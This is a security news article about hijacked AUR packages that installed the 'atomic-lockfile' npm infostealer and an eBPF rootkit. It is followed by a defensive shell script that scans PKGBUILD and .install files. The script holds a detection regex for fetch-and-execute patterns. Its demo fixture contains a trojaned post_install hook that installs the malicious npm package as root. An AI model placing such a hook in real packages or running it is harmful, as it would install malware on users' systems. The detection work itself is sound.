Over 400 AUR packages found distributing Linux rootkit and infostealer malware

Security researchers have discovered a large-scale malware campaign targeting Arch Linux users through the Arch User Repository (AUR). More than 400 packages were reportedly modified to distribute credential-stealing malware and a Linux rootkit.

According to researchers from the Independent Federated Intelligence Network (IFIN), a threat actor impersonated a trusted AUR maintainer and gained control of numerous packages. The attacker added malicious installation scripts that downloaded and executed a rogue npm package called ‘atomic-lockfile’ during software installation.

Analysis of the npm package revealed a Linux ELF binary named ‘deps.’ Researchers identified the malware as an infostealer designed to collect sensitive data from developer systems, including GitHub credentials, SSH keys, HashiCorp Vault tokens, browser cookies, shell histories, and data from applications such as Slack, Discord, Microsoft Teams, and Telegram.

The malware also contains optional eBPF (extended Berkeley Packet Filter) rootkit functionality. eBPF lets user-supplied programs run inside the Linux kernel, attached to hooks such as tracepoints and kprobes; a rootkit that loads such programs can filter what system calls return to user space and so hide its processes, files, and network connections from tools that rely on those calls. Loading eBPF programs requires root privileges (CAP_BPF or CAP_SYS_ADMIN), so this component only works once the payload already runs as root, for example from a package’s post-install hook, which pacman executes as root. Programs currently loaded into the kernel can be enumerated with ‘bpftool prog list’.

A separate investigation conducted by supply-chain security firm Sonatype found a related attack involving at least 20 orphaned AUR packages. In those cases, attackers modified package PKGBUILD files to run post-install scripts that automatically installed the malicious npm package.

Researchers noted that the malware includes capabilities for archiving stolen data, splitting files into multiple parts, and uploading information to remote servers.

Arch Linux maintainers are currently working to remove the malicious changes and ban the accounts responsible. Users are advised to read the PKGBUILD and any .install hook of an AUR package before running makepkg, to diff them against the previous revision in the package’s AUR git history, and to favor actively maintained projects with established communities.
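The following triage script is an added example for this article and is not code from the researchers, Sonatype, or the Arch project. It scans the two files an AUR package can use to run commands at build or install time (PKGBUILD and any *.install hook) for the kind of install-time fetch-and-execute behaviour described above, such as a post-install function that pulls a package from the npm registry. The pattern list and the sample package files it constructs are assumptions made for the example, not the actual malicious hooks.

```shell
#!/bin/sh
# Added example (not from the article or the Arch project): flag install-time
# fetch-and-execute behaviour in an AUR package checkout.

# Commands that have no business in an install hook: pulling from an external
# registry, piping a download into a shell, decoding an embedded blob, eval.
# Assumed heuristics for this example; hits still need a human look.
SUSPECT_RE='(npm[[:space:]]+(i|ci|install|exec)([[:space:]]|$)|npx[[:space:]]|pip[[:space:]]+install|(curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh|base64[[:space:]]+(-d|--decode)|eval[[:space:]])'

# scan_aur_pkg DIR: print each suspicious line as FILE:LINE:TEXT. Comments are
# stripped first so a commented-out command does not count.
# Returns 0 if nothing matched, 1 if anything did.
scan_aur_pkg() {
    dir=$1
    hits=0
    for f in "$dir"/PKGBUILD "$dir"/*.install; do
        [ -f "$f" ] || continue
        out=$(sed 's/[[:space:]]*#.*$//' "$f" | grep -nE "$SUSPECT_RE" || true)
        if [ -n "$out" ]; then
            printf '%s\n' "$out" | while IFS= read -r line; do
                printf '%s:%s\n' "$f" "$line"
            done
            hits=1
        fi
    done
    return $hits
}

# Constructed demo data: a clean package and a copy whose .install hook fetches
# a payload from npm at install time. Stand-ins, not the real malicious files.
demo() {
    t=$(mktemp -d)
    mkdir -p "$t/clean" "$t/trojaned"
    cat > "$t/clean/PKGBUILD" <<'EOF'
pkgname=example-tool
pkgver=1.0.0
pkgrel=1
source=("https://example.invalid/example-tool-1.0.0.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
package() {
    install -Dm755 "$srcdir/example-tool" "$pkgdir/usr/bin/example-tool"
}
EOF
    cp "$t/clean/PKGBUILD" "$t/trojaned/PKGBUILD"
    cat > "$t/trojaned/example-tool.install" <<'EOF'
post_install() {
    # pacman runs this as root; fetch and execute from the npm registry
    npm install -g atomic-lockfile >/dev/null 2>&1 || true
}
EOF
    for d in clean trojaned; do
        if scan_aur_pkg "$t/$d"; then
            echo "$d: no install-time fetch/exec found"
        else
            echo "$d: REVIEW BEFORE INSTALLING"
        fi
    done
    rm -rf "$t"
}

# Usage: ./scan-aur.sh DIR...   (no arguments runs the constructed demo)
if [ $# -gt 0 ]; then
    for d in "$@"; do
        scan_aur_pkg "$d" || echo "$d: REVIEW BEFORE INSTALLING"
    done
else
    demo
fi
```

A hit is a reason to read the file, not proof of compromise: a Node package legitimately calls npm from its build() function, and makepkg fetches everything in source=() itself, so the interesting cases are network or registry calls inside an .install hook, in package(), or on anything not pinned by a checksum in the PKGBUILD. Combine this with a git diff against the previous AUR revision, since a trojaned update usually shows up as a small addition to an otherwise unchanged package.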
